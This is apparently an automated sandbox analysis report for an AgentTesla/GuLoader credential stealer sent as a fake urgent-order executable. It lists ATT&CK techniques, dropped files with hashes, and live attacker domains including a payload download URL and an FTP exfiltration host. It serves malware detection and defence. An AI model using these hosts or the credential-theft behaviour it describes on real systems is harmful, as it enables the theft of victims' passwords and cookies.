            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
            Source: Yara matchFile source: 00000089.00000002.18044285630.000000003418B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: CasPol.exe PID: 5424, type: MEMORYSTR

            Remote Access Functionality

            barindex
            Yara detected AgentTesla
            Source: Yara matchFile source: 00000089.00000002.18044285630.000000003418B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: CasPol.exe PID: 5424, type: MEMORYSTR

            Mitre Att&ck Matrix

            Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
            Valid Accounts211
            Windows Management Instrumentation            		1
            DLL Side-Loading            		1
            DLL Side-Loading            		1
            Disable or Modify Tools            		1
            OS Credential Dumping            		2
            File and Directory Discovery            		Remote Services1
            Archive Collected Data            		1
            Exfiltration Over Alternative Protocol            		1
            Ingress Tool Transfer            		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without Authorization1
            System Shutdown/Reboot
            Default Accounts1
            Native API            		Boot or Logon Initialization Scripts1
            Access Token Manipulation            		1
            Deobfuscate/Decode Files or Information            		1
            Credentials in Registry            		117
            System Information Discovery            		Remote Desktop Protocol1
            Data from Local System            		Exfiltration Over Bluetooth11
            Encrypted Channel            		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
            Domain Accounts1
            Command and Scripting Interpreter            		Logon Script (Windows)111
            Process Injection            		1
            Obfuscated Files or Information            		Security Account Manager311
            Security Software Discovery            		SMB/Windows Admin Shares1
            Email Collection            		Automated Exfiltration2
            Non-Application Layer Protocol            		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
            Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)1
            DLL Side-Loading            		NTDS231
            Virtualization/Sandbox Evasion            		Distributed Component Object Model1
            Clipboard Data            		Scheduled Transfer23
            Application Layer Protocol            		SIM Card SwapCarrier Billing Fraud
            Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script11
            Masquerading            		LSA Secrets1
            Application Window Discovery            		SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
            Replication Through Removable MediaLaunchdRc.commonRc.common231
            Virtualization/Sandbox Evasion            		Cached Domain Credentials1
            Time Based Evasion            		VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
            External Remote ServicesScheduled TaskStartup ItemsStartup Items1
            Access Token Manipulation            		DCSync1
            System Network Configuration Discovery            		Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
            Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job111
            Process Injection            		Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
            Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)1
            Time Based Evasion            		/etc/passwd and /etc/shadowSystem Network Connections DiscoverySoftware Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 791299 Sample: Pilne zamowienie nr5363582 ... Startdate: 25/01/2023 Architecture: WINDOWS Score: 100 42 ftp.sentientshift.com 2->42 44 sentientshift.com 2->44 46 3 other IPs or domains 2->46 54 Snort IDS alert for network traffic 2->54 56 Multi AV Scanner detection for submitted file 2->56 58 Yara detected GuLoader 2->58 60 5 other signatures 2->60 8 Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe 1 34 2->8         started        signatures3 process4 file5 36 Microsoft.Practice...UnityExtensions.dll, PE32+ 8->36 dropped 38 C:\Users\user\AppData\Local\...\nsExec.dll, PE32 8->38 dropped 40 C:\Users\user\AppData\Local\...\System.dll, PE32 8->40 dropped 62 Obfuscated command line found 8->62 64 Writes to foreign memory regions 8->64 66 Tries to detect Any.run 8->66 12 CasPol.exe 15 22 8->12         started        16 cmd.exe 8->16         started        18 cmd.exe 8->18         started        20 62 other processes 8->20 signatures6 process7 dnsIp8 48 api4.ipify.org 64.185.227.155, 443, 49855 WEBNXUS United States 12->48 50 sentientshift.com 192.185.87.146, 21, 39706, 49856 UNIFIEDLAYER-AS-1US United States 12->50 52 enlluec.tk 103.83.194.19, 443, 49854 NETWORK-LEAPSWITCH-INLeapSwitchNetworksPvtLtdIN United States 12->52 68 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 12->68 70 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 12->70 72 Tries to steal Mail credentials (via file / registry access) 12->72 76 2 other signatures 12->76 22 conhost.exe 12->22         started        74 Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines) 16->74 24 Conhost.exe 16->24         started        26 Conhost.exe 18->26         started        28 Conhost.exe 20->28         started        30 Conhost.exe 20->30         started        32 Conhost.exe 20->32         started        34 59 other processes 20->34 signatures9 process10

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe10%ReversingLabs
            Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe33%VirustotalBrowse

            Dropped Files

            SourceDetectionScannerLabelLink
            C:\Users\user\AppData\Local\Temp\nsgB1F9.tmp\System.dll0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\nsgB1F9.tmp\nsExec.dll2%ReversingLabs
            C:\Users\user\Pacifisterne\Automatcafeer\Nedrustningspolitikken\Dilemmaers146\Glasgaibleanir\Nodebilledet\Microsoft.Practices.Composite.UnityExtensions.dll0%ReversingLabs

            Unpacked PE Files

            SourceDetectionScannerLabelLinkDownload
            1.0.Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe.400000.0.unpack100%AviraHEUR/AGEN.1223491Download File
            1.2.Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe.400000.0.unpack100%AviraHEUR/AGEN.1223491Download File

            Domains

            SourceDetectionScannerLabelLink
            sentientshift.com0%VirustotalBrowse
            ftp.sentientshift.com0%VirustotalBrowse

            URLs

            SourceDetectionScannerLabelLink
            https://enlluec.tk/0%Avira URL Cloudsafe
            http://sentientshift.com0%Avira URL Cloudsafe
            http://ftp.sentientshift.com0%Avira URL Cloudsafe
            https://enlluec.tk/dkVAJHULLLAJIKvMzyyDm233.pcx0%Avira URL Cloudsafe

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            api4.ipify.org
            		64.185.227.155
            		truefalse
              		high
              sentientshift.com
              		192.185.87.146
              		truefalseunknown
              enlluec.tk
              		103.83.194.19
              		truefalse
                		unknown
                ftp.sentientshift.com
                		unknown
                		unknowntrueunknown
                api.ipify.org
                		unknown
                		unknownfalse
                  		high

                  Contacted URLs

                  NameMaliciousAntivirus DetectionReputation
                  https://api.ipify.org/false
                    		high
                    https://enlluec.tk/dkVAJHULLLAJIKvMzyyDm233.pcxfalse
                    • Avira URL Cloud: safe
                    		unknown

                    URLs from Memory and Binaries

                    NameSourceMaliciousAntivirus DetectionReputation
                    http://ftp.sentientshift.comCasPol.exe, 00000089.00000002.18044285630.00000000341E4000.00000004.00000800.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://www.apache.org/licenses/LICENSE-2.0Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe, 00000001.00000003.13041218149.0000000002932000.00000004.00000020.00020000.00000000.sdmp, default.css.1.drfalse
                      		high
                      https://api.ipify.orgCasPol.exe, 00000089.00000002.18044285630.0000000034141000.00000004.00000800.00020000.00000000.sdmpfalse
                        		high
                        http://sentientshift.comCasPol.exe, 00000089.00000002.18044285630.00000000341E4000.00000004.00000800.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://creativecommons.org/licenses/by-sa/4.0/application-x-executable.png.1.drfalse
                          		high
                          http://nsis.sf.net/NSIS_ErrorPilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exefalse
                            		high
                            http://nsis.sf.net/NSIS_ErrorErrorPilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exefalse
                              		high
                              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameCasPol.exe, 00000089.00000002.18044285630.0000000034141000.00000004.00000800.00020000.00000000.sdmpfalse
                                		high
                                http://mozilla.org/MPL/2.0/.Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe, 00000001.00000003.13041218149.0000000002932000.00000004.00000020.00020000.00000000.sdmp, default.css.1.drfalse
                                  		high
                                  https://enlluec.tk/CasPol.exe, 00000089.00000002.18026950300.00000000037C8000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000089.00000002.18026950300.000000000378B000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown

                                  World Map of Contacted IPs

                                  • No. of IPs < 25%
                                  • 25% < No. of IPs < 50%
                                  • 50% < No. of IPs < 75%
                                  • 75% < No. of IPs

                                  Public IPs

                                  IPDomainCountryFlagASNASN NameMalicious
                                  103.83.194.19
                                  		enlluec.tkUnited States
                                  		132335NETWORK-LEAPSWITCH-INLeapSwitchNetworksPvtLtdINfalse
                                  192.185.87.146
                                  		sentientshift.comUnited States
                                  		46606UNIFIEDLAYER-AS-1USfalse
                                  64.185.227.155
                                  		api4.ipify.orgUnited States
                                  		18450WEBNXUSfalse

                                  General Information

                                  Joe Sandbox Version:36.0.0 Rainbow Opal
                                  Analysis ID:791299
                                  Start date and time:2023-01-25 10:02:02 +01:00
                                  Joe Sandbox Product:CloudBasic
                                  Overall analysis duration:0h 16m 40s
                                  Hypervisor based Inspection enabled:false
                                  Report type:light
                                  Sample file name:Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe
                                  Cookbook file name:default.jbs
                                  Analysis system description:Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, IE 11, Chrome 93, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
                                  Run name:Suspected Instruction Hammering
                                  Number of analysed new started processes analysed:141
                                  Number of new started drivers analysed:0
                                  Number of existing processes analysed:0
                                  Number of existing drivers analysed:0
                                  Number of injected processes analysed:0
                                  Technologies:
                                  • HCA enabled
                                  • EGA enabled
                                  • HDC enabled
                                  • AMSI enabled
                                  Analysis Mode:default
                                  Analysis stop reason:Timeout
                                  Detection:MAL
                                  Classification:mal100.troj.spyw.evad.winEXE@400/11@3/3
                                  EGA Information:
                                  • Successful, ratio: 50%
                                  HDC Information:
                                  • Successful, ratio: 48.8% (good quality ratio 48.1%)
                                  • Quality average: 87.4%
                                  • Quality standard deviation: 21.9%
                                  HCA Information:
                                  • Successful, ratio: 93%
                                  • Number of executed functions: 0
                                  • Number of non-executed functions: 0
                                  Cookbook Comments:
                                  • Found application associated with file extension: .exe
                                  • Sleeps bigger than 100000000ms are automatically reduced to 1000ms

                                  Warnings

                                  • Exclude process from analysis (whitelisted): dllhost.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, WmiPrvSE.exe, svchost.exe
                                  • TCP Packets have been reduced to 100
                                  • Excluded domains from analysis (whitelisted): ris.api.iris.microsoft.com, spclient.wg.spotify.com, wdcpalt.microsoft.com, client.wns.windows.com, login.live.com, wdcp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, arc.msn.com
                                  • Execution Graph export aborted for target CasPol.exe, PID 5424 because it is empty
                                  • Not all processes where analyzed, report is missing behavior information
                                  • Report size exceeded maximum capacity and may have missing behavior information.
                                  • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                  • Report size getting too big, too many NtQueryValueKey calls found.
                                  • Report size getting too big, too many NtReadVirtualMemory calls found.
                                  • Report size getting too big, too many NtWriteVirtualMemory calls found.

                                  Simulations

                                  Behavior and APIs

                                  No simulations

                                  Joe Sandbox View / Context

                                  IPs

                                  No context

                                  Domains

                                  No context

                                  ASNs

                                  No context

                                  JA3 Fingerprints

                                  No context

                                  Dropped Files

                                  No context

                                  Created / dropped Files

                                  C:\Users\user\AppData\Local\Temp\nsgB1F9.tmp\System.dll

                                  Download File
                                  Process:C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe
                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                  Category:dropped
                                  Size (bytes):11264
                                  Entropy (8bit):5.770803561213006
                                  Encrypted:false
                                  SSDEEP:192:vPtkumJX7zB22kGwfy0mtVgkCPOsE1un:k702k5qpdsEQn
                                  MD5:2AE993A2FFEC0C137EB51C8832691BCB
                                  SHA1:98E0B37B7C14890F8A599F35678AF5E9435906E1
                                  SHA-256:681382F3134DE5C6272A49DD13651C8C201B89C247B471191496E7335702FA59
                                  SHA-512:2501371EB09C01746119305BA080F3B8C41E64535FF09CEE4F51322530366D0BD5322EA5290A466356598027E6CDA8AB360CAEF62DCAF560D630742E2DD9BCD9
                                  Malicious:false
                                  Antivirus:
                                  • Antivirus: ReversingLabs, Detection: 0%
                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......)...m.m.m...k.m.~....j.9..i....l....l.Richm.........................PE..L...tc.W...........!.................'.......0...............................`.......................................2.......0..P............................P.......................................................0..X............................text...O........................... ..`.rdata..S....0......."..............@..@.data...h....@.......&..............@....reloc..`....P.......(..............@..B................................................................................................................................................................................................................................................................................................................................................................................

                                  C:\Users\user\AppData\Local\Temp\nsgB1F9.tmp\nsExec.dll

                                  Download File
                                  Process:C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe
                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                  Category:dropped
                                  Size (bytes):6656
                                  Entropy (8bit):4.994861218233575
                                  Encrypted:false
                                  SSDEEP:96:U7GUxNkO6GR0t9GKKr1Zd8NHYVVHp4dEeY3kRnHdMqqyVgNN3e:mXhHR0aTQN4gRHdMqJVgNE
                                  MD5:B648C78981C02C434D6A04D4422A6198
                                  SHA1:74D99EED1EAE76C7F43454C01CDB7030E5772FC2
                                  SHA-256:3E3D516D4F28948A474704D5DC9907DBE39E3B3F98E7299F536337278C59C5C9
                                  SHA-512:219C88C0EF9FD6E3BE34C56D8458443E695BADD27861D74C486143306A94B8318E6593BF4DA81421E88E4539B238557DD4FE1F5BEDF3ECEC59727917099E90D2
                                  Malicious:false
                                  Antivirus:
                                  • Antivirus: ReversingLabs, Detection: 2%
                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........d..7..7..7..7..7,..7..7..7..7..7..7Rich..7........PE..L...rc.W...........!......................... ...............................P.......................................$..l.... ..P............................@....................................................... ...............................text............................... ..`.rdata..,.... ......................@..@.data........0......................@....reloc.......@......................@..B................................................................................................................................................................................................................................................................................................................................................................................................................

                                  C:\Users\user\AppData\Roaming\0bpuok1y.lva\Chrome\Default\Cookies

                                  Download File
                                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                  File Type:SQLite 3.x database, last written using SQLite version 3036000, file counter 36, database pages 24, 1st free page 14, free pages 11, cookie 0x5, schema 4, UTF-8, version-valid-for 36
                                  Category:dropped
                                  Size (bytes):98304
                                  Entropy (8bit):2.9216957692876595
                                  Encrypted:false
                                  SSDEEP:384:ST8XNcKu0iTwbAziYN570RMZXVuKnQM2V6ofbDO4xmTgZcZygSA2O9RVHfwrhhxV:JNcgiD5Q6luKQM2V7DXcAgSA2KD4jL
                                  MD5:1A706D20E96086886B5D00D9698E09DF
                                  SHA1:DACF81D90647457585345BEDD6DE222E83FDE01F
                                  SHA-256:759F62B61AA65D6D5FAC95086B26D1D053CE1FB24A8A0537ACB42DDF45D2F19F
                                  SHA-512:CFF7D42AA3B089759C5ACE934A098009D1A58111FE7D99AC7669B7F0A1C973907FD16A4DC1F37B5BE5252EC51B8D876511F4F6317583FA9CC48897B1B913C7F3
                                  Malicious:false
                                  Preview:SQLite format 3......@ ...$...................................................................$..S`.........g.....[.[.[................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                  C:\Users\user\AppData\Roaming\0bpuok1y.lva\Edge Chromium\Default\Cookies

                                  Download File
                                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                  File Type:SQLite 3.x database, last written using SQLite version 3035005, file counter 7, database pages 5, cookie 0x4, schema 4, UTF-8, version-valid-for 7
                                  Category:dropped
                                  Size (bytes):20480
                                  Entropy (8bit):2.3172897780113213
                                  Encrypted:false
                                  SSDEEP:96:oNwCz2C+NR73QOaq9kozeav2RT3VnnnekEEN9ORelnasL:ouZC+NJLaqe0LUTpnn1DN9OROnj
                                  MD5:D5ECE7413F423743B368D55921D78C0A
                                  SHA1:3F1E854E373FB2F9BFD868AF38AF5C6B3CD2A71D
                                  SHA-256:D38D8A693CD4B718EA9E4995939262749893878EE9A0931BEB0F33781979FD77
                                  SHA-512:F54CAB99D2795DF2D01E54D1E1184D116A56E8053140BAF868ADBFC7EE35EFBC59F83E3FF26C84E0D6D1A118BB79CAB82527F1502D328483953A0A58BEED8E0B
                                  Malicious:false
                                  Preview:SQLite format 3......@ ..........................................................................O}.........g.....8....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                  C:\Users\user\AppData\Roaming\0bpuok1y.lva\Firefox\Profiles\ol7uiqa8.default-release\cookies.sqlite

                                  Download File
                                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                  File Type:SQLite 3.x database, user version 12, last written using SQLite version 3036000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                                  Category:dropped
                                  Size (bytes):98304
                                  Entropy (8bit):0.08231524779339361
                                  Encrypted:false
                                  SSDEEP:12:DQANJfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQANJff32mNVpP965Ra8KN0MG/lO
                                  MD5:886A5F9308577FDF19279AA582D0024D
                                  SHA1:CDCCC11837CDDB657EB0EF6A01202451ECDF4992
                                  SHA-256:BA7EB45B7E9B6990BC63BE63836B74FA2CCB64DCD0C199056B6AE37B1AE735F2
                                  SHA-512:FF0692E52368708B36C161A4BFA91EE01CCA1B86F66666F7FC4979C6792D598FF7720A9FAF258F61439DAD61DB55C50D992E99769B1E4D321EC5B98230684BC5
                                  Malicious:false
                                  Preview:SQLite format 3......@ ..........................................................................S`.....}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                  C:\Users\user\Pacifisterne\Automatcafeer\Nedrustningspolitikken\Dilemmaers146\Glasgaibleanir\Nodebilledet\Microsoft.Practices.Composite.UnityExtensions.dll

                                  Download File
                                  Process:C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe
                                  File Type:PE32+ executable (DLL) (console) x86-64 Mono/.Net assembly, for MS Windows
                                  Category:dropped
                                  Size (bytes):18048
                                  Entropy (8bit):5.781710632242959
                                  Encrypted:false
                                  SSDEEP:384:PDNDRvozv1hgXptjLrzs4AvgWOMrq0eMDI/:ZRvA4r77ARg/
                                  MD5:270209B12F7C117C539F574CE2576C0A
                                  SHA1:184B447F6364FA0760F862B84CBC6E717C9F5C3D
                                  SHA-256:C5DB3358A184147D6FFB41F05BBF9BA9356038A0867A783F266EA62813EF6CF4
                                  SHA-512:BB062EF832EB2B477D92FDF71C0B6B30AA590A735DEC1920400C3DA74EC07FF1F1DBF9E50E63EE2FDD68E9E48FC39F5522DFF0A029E47658A41F88EEC9FD250A
                                  Malicious:false
                                  Antivirus:
                                  • Antivirus: ReversingLabs, Detection: 0%
                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d...W..S.........." .....0............... .....@..... ....................................@...@......@............... ...............................`...............8..............dM............................................................... ..H............text...6.... ...0.................. ..`.rsrc........`.......2..............@..@.reloc...............8..............@..BH........*..\#..........`&........................................................{....*"..}....*..{....*"..(....*...0............}.....o......-.(....s....z.r...p..o......o....(.....(....-.(....s....z.r3..p..o.....(....o...+&.o.....r_..p..o.....o....&.o....&.o.....r...p..o.....o......,...(....o...+(....(.....r...p..o.....o.....r...p..o....*..(...(....(.....+...(....(.....,...(....(....*2.(....o...+*...0..%..........(.....o....o...+&.o......,..(.....o...+&.{....9......-...(.........(.

                                  C:\Users\user\Pacifisterne\Automatcafeer\Nedrustningspolitikken\Dilemmaers146\Glasgaibleanir\Nodebilledet\Reinspired.Aut

                                  Download File
                                  Process:C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe
                                  File Type:ASCII text, with very long lines (50244), with no line terminators
                                  Category:dropped
                                  Size (bytes):50244
                                  Entropy (8bit):3.999625167208849
                                  Encrypted:false
                                  SSDEEP:768:4Kt0hO4obUZX9nvBHp7RJ+CqqSK0haV6RTFA9yu7m1HK0TWgKL383w6gW:81oq9nvjqqSiUu9yu7m1HzT4L38AhW
                                  MD5:21337BAB1F65E60A88523B4DDB961E52
                                  SHA1:AD9C448F53AB48C3110D25650BACFE44C1988D51
                                  SHA-256:E2565D3B49D70ACDAD0AB4162BA0FBF738F227A0EC224982A813E874C46C0FCE
                                  SHA-512:A6DAE16844C6A433AFF4EDE77F0E77984073CEC0E38D439B57144670EE0F4034BD5F2FFCB6647010F6717A7F39928A6F04E7F05BA9511745F38CF6A49891FFDA
                                  Malicious:false
                                  Preview:56E3E082070CC707B0B701B836A6FEDCB0D7E6E50989CF2DA81B4311EF928EBF02F09C7EB977BC9031BA864CC44F17929BE2524D78FC507F411DCBC91BE502D51D27CA45924DFC91765F6EB7845C91C0D665E583A8AD0203D0E4E6E6CD17355A6BEE2CB460D8FEE6D05422DDF5EE3A100E5B5DF7E16AF5EE06574C03F45CF5AB392237D86BD7BA856648AFC8934A58C5CB26436F55DDADFBBF10B9B4879334CB8EC34E3188C13AB624B5BD476E64AE8E29F5D01B1F4990A3C97BFCFF07D4B1C9164FF864EC64F66817B8CB32DEDF9FCDD8BFEA77F0E8FA2FF734E9693AB8DB0E567BF76D363F5446629BF43E8658F94A657CA3A4E1F8CBE2A0DF2079A857E95B935916B09270CBD505DC004B5398C830A48C5BEC0BF51F45B3CF8B5BB54C379E941830FBE112B9AA311E3DDCB33515B088213DF149B237AA4C2FDEF37D6456FA22C12527A4B8369506B1AD0523F47A8479C3F96173652E3E9D10BC37BBDA514166816FEB43067D30B2F3AF7514968878341027AC20B0A426E2E7C25DCBA0B6FED381151DDA1B09092FF33782B8325E6B87234F9652F4DB96B3783CDA3D515E98CEDAACDBA19D8B6F8900215829145E262A081177B80AA3834EDBFF2F96C95ED77E31546A6F59C87BE0A467B5CF31606F7D2E6453A34C7B7AF3DAFCFB71E6B5770C2B1BC25C472C3653338393230C4F9FFB4398AD

                                  C:\Users\user\Pacifisterne\Automatcafeer\Seacross.Him

                                  Download File
                                  Process:C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe
                                  File Type:data
                                  Category:dropped
                                  Size (bytes):285823
                                  Entropy (8bit):7.384888860358361
                                  Encrypted:false
                                  SSDEEP:3072:RPwTCrZk0BdcUdJ9bh2df3UvT1q3olHbVfvco8uKbtfEqL42V9oCWRtTT5sEgZOF:hTe00ykdvUvT1XGcofEmopbtlXF
                                  MD5:6CD4A3E95E9C6BA051D63C5177522F4B
                                  SHA1:38CBCD09C46F8637421F4D604C9C634A755D7EB0
                                  SHA-256:98BBC8D8E0B70E12F3A2C541CA197D27FFBC4B25BEDB517E0C510A20F0EEAC17
                                  SHA-512:E23F984A19945EB3A0595F5AB74D9C7D5EFDDC03B12CB376AAC4FF301B614619C7DB625387DCB8F9339F1F0EB148C329652FF9303FD053A74618E51CF8232116
                                  Malicious:false
                                  Preview:XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX

                                  C:\Users\user\Pacifisterne\Automatcafeer\Syntaksgenkendelsernes\Temposkifterne\default.css

                                  Download File
                                  Process:C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe
                                  File Type:Unicode text, UTF-8 text
                                  Category:dropped
                                  Size (bytes):19729
                                  Entropy (8bit):4.854870578875106
                                  Encrypted:false
                                  SSDEEP:384:SfWIec2c8Fn9khSO774VZE+HDxYADgab6YDrvCEE5c:SfWpc8Fn9khSO3yZE+HFYADJv/E5c
                                  MD5:A9006B652EBD39E033121BBAD1D45AC9
                                  SHA1:A9A681BD5801984388334C85B8E09561A21913FF
                                  SHA-256:E84FAFC9058C23AD27C2BE6BB8ED9CAC9AAC1744376330D53D7D531C1EA3EABE
                                  SHA-512:0B2F899C1FB7030F5ACA15E4F23F250CC62D5014ECBAE0E5CE738F9172895AB82C2B93693F3A078EC3642B3549355E25DA16834A9714CCF8B33087ED3BACAF1B
                                  Malicious:false
                                  Preview:/*. * This file is part of the LibreOffice project.. *. * This Source Code Form is subject to the terms of the Mozilla Public. * License, v. 2.0. If a copy of the MPL was not distributed with this. * file, You can obtain one at http://mozilla.org/MPL/2.0/.. *. * This file incorporates work covered by the following license notice:. *. * Licensed to the Apache Software Foundation (ASF) under one or more. * contributor license agreements. See the NOTICE file distributed. * with this work for additional information regarding copyright. * ownership. The ASF licenses this file to you under the Apache. * License, Version 2.0 (the "License"); you may not use this file. * except in compliance with the License. You may obtain a copy of. * the License at http://www.apache.org/licenses/LICENSE-2.0 .. */./*.+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++.+ LIBREOFFICE HELP IN BROWSER +.+ DEFAULT STYLE

                                  C:\Users\user\Pacifisterne\Automatcafeer\Syntaksgenkendelsernes\Temposkifterne\network-cellular-signal-none-symbolic.svg

                                  Download File
                                  Process:C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe
                                  File Type:SVG Scalable Vector Graphics image
